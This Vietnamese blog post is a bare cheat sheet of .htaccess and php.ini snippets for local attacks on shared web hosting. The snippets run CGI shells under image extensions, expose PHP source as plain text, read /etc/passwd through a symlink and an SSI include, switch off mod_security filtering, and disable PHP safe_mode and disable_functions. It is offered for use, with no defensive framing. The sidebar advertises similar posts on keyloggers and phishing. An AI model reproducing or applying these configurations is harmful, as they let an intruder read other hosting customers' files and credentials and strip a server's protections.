• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » .htaccess » Bypass » Code » Local Attack » Symlink » .htaccess

.htaccess

Unknown Labels: .htaccess, Bypass, Code, Local Attack, Symlink Leave A Comment 19:31
cgitelnet symlink htaccess

symljnk ghi vào file.hack
download file.hack về
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*).mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack

SSI VIEW SYMLJNK
.htaccess
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml
ln -s /et/passwd juno.txt 
juno.shtml:
<!--#include virtual="juno.txt" -->
direct symljnk view file.php dưới dạng file text
options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType text/plain .php
AddHandler server-parsed .php


 Safe mod off
Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini 
or
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
php.ini:
safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off
or
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl tmt

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
VIEW file.php
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any 
hạ safe_mode
php.ini
safe_mode = Off
disable_functions = ""
.htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule> 
.htaccess
AddHandler application/x-httpd-php4 .php .php4 .php3
.htaccess
php_flag safe_mode off
php_flag disable_functions "" 
.htaccess
 php_admin_value disable_functions ""
php_admin_value safe_mode off
.htaccess
php_value safe_mode off
php_value disable_functions ""
.htaccess
SetEnv PHPRC /home/user/public_html/php.ini
.htaccess
suPHP_ConfigPath /home/user/public_html/php.ini
.htaccess
<Files *.php>
ForceType application/x-httpd-php4
</Files>

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • PSD - Người & Ta
    DOWNLOAD PSD
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Wordpress Plugins Spotlight Your Upload Vulnerability
    ___________.__ _________ _________ \__ ___/| |__ ____ \_ ___ \______ ...
  • Owasp Xelenium - XSS Scanner
    XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web a...
  • Hướng dẫn "Hack lại Keylogger"
    Hướng dẫn: Hack lại Keylogger Công cụ: Sniff Pass http://www.nirsoft.net/utils/password_sniffer.html Tutorial by Juno_okyo GhostClub's T...
  • DỊCH VỤ MAKERTING FACEBOOK ONLINE BY TRẦN HOÀNG DŨ
    DỊCH VỤ MAKERTING FACEBOOK ONLINE BY  TRẦN HOÀNG DŨ Nhận Mỡ Khóa Tài Khoản Tên Giả : 150K ( Không Mail 200K ) Nhận Mỡ Khóa Tài Khoản Checkpo...
  • Tội phạm lừa đảo - Phần VI: Đánh cắp nhận dạng
    Bạn làm việc chăm chỉ cần mẫn hàng ngày chỉ với mong muốn kiếm sống nuôi lấy bản thân. Bạn phải hết sức dè sẻn trong chi tiêu hàng ngày, và...
  • Phemail.py: Phishing EMail Social Engineering Tool
    Social Engineering is defined as the process of inducing people into giving away access or confidential information. From a security consu...

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • PSD - Người & Ta
    PSD - Người & Ta
    DOWNLOAD PSD
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Wordpress Plugins Spotlight Your Upload Vulnerability
    ___________.__ _________ _________ \__ ___/| |__ ____ \_ ___ \______ ...
  • Owasp Xelenium - XSS Scanner
    XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web a...
  • Hướng dẫn "Hack lại Keylogger"
    Hướng dẫn "Hack lại Keylogger"
    Hướng dẫn: Hack lại Keylogger Công cụ: Sniff Pass http://www.nirsoft.net/utils/password_sniffer.html Tutorial by Juno_okyo GhostClub's T...
  • DỊCH VỤ MAKERTING FACEBOOK ONLINE BY TRẦN HOÀNG DŨ
    DỊCH VỤ MAKERTING FACEBOOK ONLINE BY TRẦN HOÀNG DŨ
    DỊCH VỤ MAKERTING FACEBOOK ONLINE BY  TRẦN HOÀNG DŨ Nhận Mỡ Khóa Tài Khoản Tên Giả : 150K ( Không Mail 200K ) Nhận Mỡ Khóa Tài Khoản Checkpo...
  • Tội phạm lừa đảo - Phần VI: Đánh cắp nhận dạng
    Bạn làm việc chăm chỉ cần mẫn hàng ngày chỉ với mong muốn kiếm sống nuôi lấy bản thân. Bạn phải hết sức dè sẻn trong chi tiêu hàng ngày, và...
  • Phemail.py: Phishing EMail Social Engineering Tool
    Social Engineering is defined as the process of inducing people into giving away access or confidential information. From a security consu...
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt